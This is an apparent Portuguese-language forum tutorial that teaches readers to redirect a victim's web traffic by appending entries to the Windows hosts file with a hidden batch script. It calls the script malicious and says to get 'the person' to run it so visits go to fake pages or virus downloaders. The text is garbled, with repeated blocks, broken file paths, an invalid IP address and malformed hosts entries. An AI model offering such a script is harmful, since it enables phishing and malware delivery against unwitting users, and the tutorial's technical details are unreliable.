antes de começar-mos, temos que entender o que é DNS;
http://pt.wikipedia.org/wiki/Domain_Name_System
Agora vamos aprender como Spoofar um DNS:.
O seu pc salva o ip para cada DNS por exmplo:
64.233.163.104 http://www.google.com.br/
200.152.168.167 http://www.yahoo.com.br/
e assim vai... mas e se vc pudesse simplesmente trocar o ip do DNS??? onde ao a pessoa digitar http://www.google/ naum levasse para o IP: 64.233.163.104 ???
Sim é nisso que se baseia o DNS Spoof ele troca o ip gravado no seu pc para após vc digitar o DNS ( URl para qem ainda não entendeu ) redirecionar para a pagina fake, ou site ( geralmente sao paginas fakes ou sites com virus downloaders (fazem download automatico)).
ficando assim:
IP DNS
64.233.163.104 http://www.google.com.br/
(normal)
200.012.123.432 http://www.google.com.br/
(envenenado por DNS Spoof)
Consequentemente apos a pessoa digitar http://www.google.com.br/ se espoofado neste caso ira para o
IP: 200.012.123.432 e naum para o da pagina do google, bom a teoria esta dada agora a melhor parte....
.::A pratica::.
Bom ja deu pra ver que é interessante mais como vamos fazer o DNS Spoofing, o DNS Spoofing pode ser feito pela linguagem batch...
o Script malicioso eh o seguinte:
@echo off
echo IP Host>>C:\windows\system32\drivers\etc\hosts
echo 64.233.163.104 http://www.yahoo.com.br>>c\windows\system32\drivers\etc\hosts
no exemplo acima toda vez q a pessoa entrar no http://www.yahoo.com.br/ sera redirecionado para o google, para vcs entenderem melhor deixei de vermelho o site a ser redirecionado e em verde o site q toda vez q vc entrar sera redirecionado para o IP em vermelho!!!
bom ai eh só salvar em .bat (ex: spoofar.bat ou dns.bat e assim vai...)
faça a pessoa executar e poof DNS Spoof executado com sucesso...!
bom galera eh isso no proximo tutoria de DNS Spoofing eu vo encinar como transformar de .bat em .exe e em outro o q fazer se vc foi infectado, alem de em um ai encinar vcs a fazer a propria pagina fake xD
http://pt.wikipedia.org/wiki/Domain_Name_System
Agora vamos aprender como Spoofar um DNS:.
O seu pc salva o ip para cada DNS por exmplo:
IP DNS
64.233.163.104 http://www.google.com.br/
200.152.168.167 http://www.yahoo.com.br/
e assim vai... mas e se vc pudesse simplesmente trocar o ip do DNS??? onde ao a pessoa digitar http://www.google/ naum levasse para o IP: 64.233.163.104 ???
Sim é nisso que se baseia o DNS Spoof ele troca o ip gravado no seu pc para após vc digitar o DNS ( URl para qem ainda não entendeu ) redirecionar para a pagina fake, ou site ( geralmente sao paginas fakes ou sites com virus downloaders (fazem download automatico)).
ficando assim:
IP DNS
64.233.163.104 http://www.google.com.br/
(normal)
200.012.123.432 http://www.google.com.br/
(envenenado por DNS Spoof)
Consequentemente apos a pessoa digitar http://www.google.com.br/ se espoofado neste caso ira para o
IP: 200.012.123.432 e naum para o da pagina do google, bom a teoria esta dada agora a melhor parte....
.::A pratica::.
Bom ja deu pra ver que é interessante mais como vamos fazer o DNS Spoofing, o DNS Spoofing pode ser feito pela linguagem batch...
o Script malicioso eh o seguinte:
@echo off
echo IP Host>>C:\windows\system32\drivers\etc\hosts
echo IP Host>>C:\windows\system32\drivers\etc\hosts.msn
Primeiro vamos analizar o codigo depois ensino como usa-lo:
@echo off --> serve para naum mostrar a janela do CMD
echo IP Host>>C:\windows\system32\drivers\etc\hosts ---> vai fazer com que cada vez que você entre no Host seja redirecionado para o IP
.::Como usar::.
Isto é bem simples onde esta IP vc troca pelo ip do site q quer q redirecione sua pagina fake por exemplo ( para pegar o ip va ateh o CMD (prompt de comando) e digite:
ping http://www.suapaginafake.com.br/ e de enter o ip de seu site ou pagina fake vai aparecer entre "[]"
exemplo:
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Users\seu usuario>ping http://www.google.com.br/
Pinging http://www.l.google.com/ [64.233.163.104] with 32 bytes of data:
Reply from 64.233.163.104: bytes=32 time=10ms TTL=56
Reply from 64.233.163.104: bytes=32 time=11ms TTL=56
Reply from 64.233.163.104: bytes=32 time=17ms TTL=56
Reply from 64.233.163.104: bytes=32 time=11ms TTL=56
Ping statistics for 64.233.163.104:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 10ms, Maximum = 17ms, Average = 12ms
pront agora eé soh trocar o IP pelo do site q ira redirecionar, e o Host pelo site a ser spoofado
ex:
@echo off
Primeiro vamos analizar o codigo depois ensino como usa-lo:
@echo off --> serve para naum mostrar a janela do CMD
echo IP Host>>C:\windows\system32\drivers\etc\hosts ---> vai fazer com que cada vez que você entre no Host seja redirecionado para o IP
.::Como usar::.
Isto é bem simples onde esta IP vc troca pelo ip do site q quer q redirecione sua pagina fake por exemplo ( para pegar o ip va ateh o CMD (prompt de comando) e digite:
ping http://www.suapaginafake.com.br/ e de enter o ip de seu site ou pagina fake vai aparecer entre "[]"
exemplo:
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Users\seu usuario>ping http://www.google.com.br/
Pinging http://www.l.google.com/ [64.233.163.104] with 32 bytes of data:
Reply from 64.233.163.104: bytes=32 time=10ms TTL=56
Reply from 64.233.163.104: bytes=32 time=11ms TTL=56
Reply from 64.233.163.104: bytes=32 time=17ms TTL=56
Reply from 64.233.163.104: bytes=32 time=11ms TTL=56
Ping statistics for 64.233.163.104:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 10ms, Maximum = 17ms, Average = 12ms
pront agora eé soh trocar o IP pelo do site q ira redirecionar, e o Host pelo site a ser spoofado
ex:
@echo off
echo 64.233.163.104 http://www.yahoo.com.br>>c\windows\system32\drivers\etc\hosts
echo 64.233.163.104 http://www.yahoo.com.br>> C:\windows\system32\drivers\etc\hosts.msn
no exemplo acima toda vez q a pessoa entrar no http://www.yahoo.com.br/ sera redirecionado para o google, para vcs entenderem melhor deixei de vermelho o site a ser redirecionado e em verde o site q toda vez q vc entrar sera redirecionado para o IP em vermelho!!!
bom ai eh só salvar em .bat (ex: spoofar.bat ou dns.bat e assim vai...)
faça a pessoa executar e poof DNS Spoof executado com sucesso...!
bom galera eh isso no proximo tutoria de DNS Spoofing eu vo encinar como transformar de .bat em .exe e em outro o q fazer se vc foi infectado, alem de em um ai encinar vcs a fazer a propria pagina fake xD
About the Author.jpg)
